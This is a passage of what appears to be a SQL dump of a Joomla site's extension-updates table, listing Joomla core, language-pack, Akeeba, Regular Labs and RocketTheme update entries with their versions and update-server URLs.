Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10562,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10563,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10564,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10565,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10566,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10567,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10568,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10569,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10570,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10571,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10572,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10573,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10574,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10575,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10576,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10577,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10578,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10579,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10580,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10581,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10582,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10583,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10584,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10585,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10586,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10587,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10588,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10589,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10590,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10591,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10592,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10593,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10594,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10595,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10596,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10597,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10598,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10599,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-10.html			\n		',''),(10600,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(10601,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-10.html			\n		',''),(10602,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(10603,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(10604,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(10605,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(10606,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10607,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10608,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10609,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/7-0-0.html			\n		',''),(10610,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10611,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10612,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10613,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10614,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/7-0-0.html			\n		',''),(10615,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10616,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10617,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10618,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10619,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10620,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/7-0-0.html			\n		',''),(10621,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10622,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10623,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10624,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10625,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/7-0-0.html			\n		',''),(10626,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10627,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10628,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10629,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10630,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-1.html\n				',''),(10631,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10632,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10633,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10634,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10635,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-1.html\n				',''),(10636,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10637,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10638,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10639,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10640,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-1.html\n				',''),(10641,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10642,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10643,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10644,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10645,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-1.html\n				',''),(10646,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10647,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10648,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10649,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10650,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-1.html\n				',''),(10651,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10652,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10653,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10654,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10655,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10656,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10657,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10658,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10659,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10660,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10661,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10662,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10663,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10664,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10665,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10666,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10667,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10668,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10669,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10670,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10671,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10672,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10673,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10674,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10675,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10676,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10677,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10678,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10679,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10680,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10681,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10682,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10683,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10684,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10685,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10686,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10687,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10688,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10689,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10690,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10691,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10692,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10693,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10694,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10695,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10696,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10697,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10698,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10699,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10700,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10701,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10702,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(10703,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(10704,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(10705,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(10706,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(10707,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(10708,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(10710,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10711,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10712,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10713,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10714,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10715,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10716,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10717,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10718,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10719,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10720,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10721,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10722,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10723,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10724,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10725,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10726,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10727,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10728,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10729,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10730,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10731,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10732,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10733,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10734,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10735,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10736,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10737,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10738,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10739,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10740,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10741,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10742,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10743,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10744,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10745,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10746,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10747,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10748,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10749,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10750,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10751,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10752,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10753,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10754,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10755,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10756,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10757,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10758,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-1.html\n				',''),(10759,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(10760,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(10761,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(10763,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10764,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10765,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10766,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10767,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-1.html\n				',''),(10768,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10769,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10770,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10771,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10772,67,0,'Akeeba Backup Core package','Akeeba Backup Core 